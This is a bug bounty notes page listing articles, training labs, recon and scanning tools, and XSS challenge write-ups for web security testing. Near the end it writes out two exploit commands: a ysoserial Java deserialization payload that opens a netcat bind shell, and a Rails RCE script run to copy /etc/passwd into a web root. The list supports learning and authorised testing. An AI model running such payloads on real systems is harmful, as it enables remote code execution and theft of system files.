Bug Bounty Notes

BugBounty links and tools

• XSS: htmlpurifier org Xss Attacks
• XSS: WAF community bypasses
• XSS: Eko2020 Bounty Hunters Adrian Pedrazzoli XSS de -1 a 0
• BugCrowd Mail: BugCrowd Email Forward
• Awesome waf: Awesome waf
• Pentester Land: PentesterLand
• Bugbounty forum: Bugbounty forum
• Automated Scanner: Automated scanner
• BugBountyHunting Search Engine: BugBountyHunting Search Engine
• How I was able to Turn a XSS into a Account Takeover How I was able to Turn a XSS into a Account Takeover
• OSCP Preparation Notes Offensive Security Approved OSCP Notes for Educational Purpose
• Amass Config Datasources: Amass Config Datasources
• Markdown editor: Markdowneditor
• Recon with me
• A $1000 Bounty
• Getting started in bug bounties: Basic Strategy
• A Pentester’s Guide to Server Side Request Forgery (SSRF)
• tomnomnom xss payloads
• Missing CORS leads to Complete Account Takeover
• Bug Bounty Dorks
• Fuzzing DNS
• Bypass XSS filters using data URIs
• OSINT with Dorks
• All is XSS that comes to the .NET
• Stealing JWTs in localStorage via XSS
• Git tricks
• Accessing a public amazon S3 bucket using AWS CLI
• The beauty of chaining client-side bugs
• Weaponizing BURP to work as an evil SSRF Confluence Server.
• Bypass Uppercase filters like a PRO (XSS Advanced Methods)

Training:

• Pentesterlab
• Prompt.ml XSS
• Kontra OWASP Top 10 for Web
• Kontra OWASP Top 10 for API

Tools:

• MainRecon
• Offensive-Docker
• ReconPi
• BurpBounty
• hackerscrolls/SecurityTips
• Go
• Subfinder
• Subjack
• Aquatone
• httprobe
• assetfinder
• meg
• tojson
• unfurl
• gf
• anew
• qsreplace
• ffuf
• gobuster
• amass
• getJS
• gau
• shuffledns
• dnsprobe
• naabu
• nuclei
• nuclei-template
• cf-check
• massdns
• jq
• masscan
• Corsy
• Arjun
• Diggy
• Dnsgen
• Sublert
• Findomain
• github-subdomain
• linkfinder
• bass
• interlace
• nmap
• Seclist
• Dirsearch
• Dalfox
• Hakrawler
• Naabu
• chaos
• httpx
• altdns
• requestbin
• webhook site
• ssrftest
• ObjectInputStream with ysoserial: tool for generating payloads that exploit unsafe Java object deserialization example: java -jar ysoserial-0.0.4-all.jar Spring1 “/usr/bin/nc -l -p 9999 -e /bin/sh” | base64
• CVE-2013-0156: Rails Object Injection example: ruby rails_rce.rb http://ptl-7806f37b-423a5564.libcurl.so/ ‘cp /etc/passwd /var/www/html/passwd.txt’

Intigriti Challenges

• March 2021 Intigriti — XSS Challenge 0321 XSS with CSRF Bypass
• February 2021 Intigriti’s February XSS Challenge Writeup
• January 2021 Intigriti’s January XSS Challenge